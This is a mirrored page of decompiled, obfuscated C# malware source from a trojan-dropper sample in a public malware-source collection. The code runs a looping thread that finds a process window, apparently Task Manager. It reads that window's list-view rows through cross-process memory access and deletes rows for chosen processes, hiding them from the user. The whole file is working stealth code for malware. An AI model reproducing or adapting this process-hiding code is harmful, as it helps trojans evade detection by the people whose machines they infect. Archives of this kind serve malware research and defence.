mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
175 lines
5.7 KiB
C#
175 lines
5.7 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u0008;
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Management;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace \u0008
|
|||
|
{
|
|||
|
internal static class \u0005
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
private static bool \u0001;
|
|||
|
private static DateTime \u0001;
|
|||
|
private static int \u0001;
|
|||
|
private static bool \u0002;
|
|||
|
|
|||
|
public static void \u000F([In] Process obj0)
|
|||
|
{
|
|||
|
if (!\u0005.\u0001)
|
|||
|
\u0005.\u000F();
|
|||
|
\u0005.\u0001 obj = new \u0005.\u0001(obj0);
|
|||
|
\u0005.\u0002 = true;
|
|||
|
}
|
|||
|
|
|||
|
private static void \u000F()
|
|||
|
{
|
|||
|
new Thread((ThreadStart) (() =>
|
|||
|
{
|
|||
|
while (true)
|
|||
|
{
|
|||
|
\u0005.\u0010();
|
|||
|
Thread.Sleep(10);
|
|||
|
}
|
|||
|
})).Start();
|
|||
|
\u0005.\u0001 = true;
|
|||
|
}
|
|||
|
|
|||
|
private static void \u0010()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
IntPtr mainWindowHandle = Process.GetProcessesByName(\u0005.\u0001(2426))[0].MainWindowHandle;
|
|||
|
\u0006.\u0004 structure = new \u0006.\u0004();
|
|||
|
structure.\u0001 = Marshal.SizeOf((object) structure);
|
|||
|
\u0006.\u000F(mainWindowHandle, ref structure);
|
|||
|
bool flag1 = structure.\u0003 == 1 || structure.\u0003 == 3;
|
|||
|
IntPtr num1 = \u0006.\u000F(\u0006.\u000F(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
|
|||
|
IntPtr num2 = \u0006.\u000F(mainWindowHandle);
|
|||
|
IntPtr num3 = \u0006.\u0010(num2, 2);
|
|||
|
IntPtr num4 = \u0006.\u0010(num3, 1);
|
|||
|
uint num5 = \u0006.\u000F(num3, 0);
|
|||
|
if (num4 != IntPtr.Zero)
|
|||
|
{
|
|||
|
\u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) \u0006.\u000F(num4, 3), IntPtr.Zero);
|
|||
|
\u0006.\u0010(num3, (uint) (int) num4, 1U);
|
|||
|
}
|
|||
|
\u0006.\u000F(num2, num5, 1U);
|
|||
|
if (flag1)
|
|||
|
\u0006.\u000F(num1);
|
|||
|
if ((DateTime.Now - \u0005.\u0001).TotalMilliseconds > 1000.0)
|
|||
|
{
|
|||
|
\u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) num5, IntPtr.Zero);
|
|||
|
\u0005.\u0001 = DateTime.Now;
|
|||
|
}
|
|||
|
GC.Collect();
|
|||
|
int num6 = (int) \u0006.\u000F(num1, 4100U, IntPtr.Zero, \u0005.\u0001(911));
|
|||
|
if (num6 != \u0005.\u0001 || \u0005.\u0002)
|
|||
|
{
|
|||
|
\u0005.\u0002 = false;
|
|||
|
\u0005.\u0001 = num6;
|
|||
|
for (int index1 = 0; index1 < num6; ++index1)
|
|||
|
{
|
|||
|
string[] strArray = new string[10];
|
|||
|
for (int index2 = 0; index2 < 10; ++index2)
|
|||
|
{
|
|||
|
strArray[index2] = \u0005.\u000F(num1, index1, index2).ToLower();
|
|||
|
if (index2 > 0 && strArray[index2] == strArray[0])
|
|||
|
break;
|
|||
|
}
|
|||
|
foreach (\u0005.\u0001 obj in \u0005.\u0001.\u0001)
|
|||
|
{
|
|||
|
bool flag2 = false;
|
|||
|
bool flag3 = false;
|
|||
|
for (int index3 = 0; index3 < 10 && strArray[index3] != null && (!flag2 || !flag3); ++index3)
|
|||
|
{
|
|||
|
if (strArray[index3].StartsWith(obj.\u0001))
|
|||
|
flag2 = true;
|
|||
|
else if (strArray[index3] == obj.\u0002)
|
|||
|
flag3 = true;
|
|||
|
}
|
|||
|
if (flag2 && flag3)
|
|||
|
{
|
|||
|
\u0006.\u000F(num1, 4104U, (IntPtr) index1--, IntPtr.Zero);
|
|||
|
--\u0005.\u0001;
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
if (!flag1)
|
|||
|
return;
|
|||
|
\u0006.\u000F(IntPtr.Zero);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static string \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2)
|
|||
|
{
|
|||
|
\u0006.\u0001 obj = new \u0006.\u0001();
|
|||
|
IntPtr hglobal = Marshal.AllocHGlobal(1024);
|
|||
|
uint lpdwProcessId;
|
|||
|
int num1 = (int) \u0006.\u000F(obj0, out lpdwProcessId);
|
|||
|
IntPtr num2 = \u0006.\u000F(2035711U, false, (int) lpdwProcessId);
|
|||
|
IntPtr num3 = \u0006.\u000F(num2, IntPtr.Zero, 1024U, 4096U, 4U);
|
|||
|
obj.\u0001 = 1U;
|
|||
|
obj.\u0001 = obj1;
|
|||
|
obj.\u0002 = obj2;
|
|||
|
obj.\u0001 = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (\u0006.\u0001)));
|
|||
|
obj.\u0003 = 50;
|
|||
|
\u0006.\u000F(num2, num3, ref obj, Marshal.SizeOf(typeof (\u0006.\u0001)), 0);
|
|||
|
\u0006.\u000F(obj0, 4101U, IntPtr.Zero, num3);
|
|||
|
\u0006.\u000F(num2, num3, hglobal, 1024, 0);
|
|||
|
string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) hglobal + Marshal.SizeOf(typeof (\u0006.\u0001))));
|
|||
|
Marshal.FreeHGlobal(hglobal);
|
|||
|
\u0006.\u000F(num2, num3, 0, 32768U);
|
|||
|
\u0006.\u0010(num2);
|
|||
|
return stringAnsi;
|
|||
|
}
|
|||
|
|
|||
|
private static string \u000F([In] Process obj0)
|
|||
|
{
|
|||
|
foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0005.\u0001(2439) + (object) obj0.Id).Get())
|
|||
|
{
|
|||
|
string[] args = new string[1]{ \u0005.\u0001(911) };
|
|||
|
if (Convert.ToInt32(managementObject.InvokeMethod(\u0005.\u0001(2504), (object[]) args)) == 0)
|
|||
|
return args[0];
|
|||
|
}
|
|||
|
return \u0005.\u0001(911);
|
|||
|
}
|
|||
|
|
|||
|
static \u0005()
|
|||
|
{
|
|||
|
\u0003.\u000F();
|
|||
|
\u0005.\u0001 = DateTime.Now;
|
|||
|
}
|
|||
|
|
|||
|
private sealed class \u0001
|
|||
|
{
|
|||
|
public static List<\u0005.\u0001> \u0001 = new List<\u0005.\u0001>();
|
|||
|
public string \u0001;
|
|||
|
public string \u0002;
|
|||
|
|
|||
|
public \u0001([In] Process obj0)
|
|||
|
{
|
|||
|
this.\u0001 = obj0.ProcessName.ToLower();
|
|||
|
this.\u0002 = \u0005.\u000F(obj0).ToLower();
|
|||
|
lock (\u0005.\u0001.\u0001)
|
|||
|
\u0005.\u0001.\u0001.Add(this);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|